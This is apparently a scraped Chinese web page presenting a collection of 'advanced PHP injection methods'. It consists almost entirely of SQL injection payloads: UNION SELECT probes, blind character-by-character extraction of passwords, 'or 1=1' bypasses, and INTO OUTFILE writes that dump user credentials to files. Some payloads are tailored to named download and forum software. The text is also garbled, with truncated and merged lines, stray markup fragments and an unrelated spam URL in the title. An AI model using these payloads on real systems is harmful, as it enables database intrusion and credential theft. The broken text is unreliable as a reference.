http://www.56.com/m2v/?magic=1 進階php注入方法精選第1/2頁
- WBOY原創
- 2016-07-29 08:38:251400瀏覽
'%23
' and passWord='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97) 🎜>id=1 union select 1,1,1 from members
id=1 union select 1,1,1,1 from admin
id=1 union se.user,1,1, and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord( mid(password,3,1))>111 (ord函數很好用,可以回整形的)
' and LENGTH(password)='6(偵測密碼長度)
' and LEFT(password,1 )='m
' and LEFT(password,2)='my
…………………………依次類推
' union select 1,username,password from user/* union select 1,username,password from user/* union select 1,username,password from user/* union select 1,H >' union select 1,username,password from user/*
=' union select 1,username,password from user/* (可為1或=後直接接)
9999' password from user/*
' into outfile 'c:/file.txt (匯出檔案)
=' or 1=1 into outfile ,password from user into outfile 'c:/user.txt
select password FROM admins where login='John' INTO DUMPFILE '/path/lecto/site/file.to username,password from user into outfile
id=-1 union select 1,database(),version() (彈性應用程式查詢)
常用查詢測試語句,
select * 🎜>select * FROM table where 'uuu'='uuu'
select * FROM table where 12 select * FROM table where 1
select * FROM table where 1+1
select * FROM table select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULLIS AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * :夜貓下載系統1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替換,尋找密碼)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (驗證第一位密碼)
union select 1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色軌跡 變換id進行測試(meteor)
union%20(select%20allowsmilies ,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20by%20eventdate
union%20(select%) ,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
目前1/2頁 12下一頁
以上就介紹了http://www.56.com/m2v/?magic=1 高級php注入方法集錦第1/2頁,包括了http://www.56.com/m2v/?magic=1方面的內容,希望對PHP教學有興趣的朋友有幫助。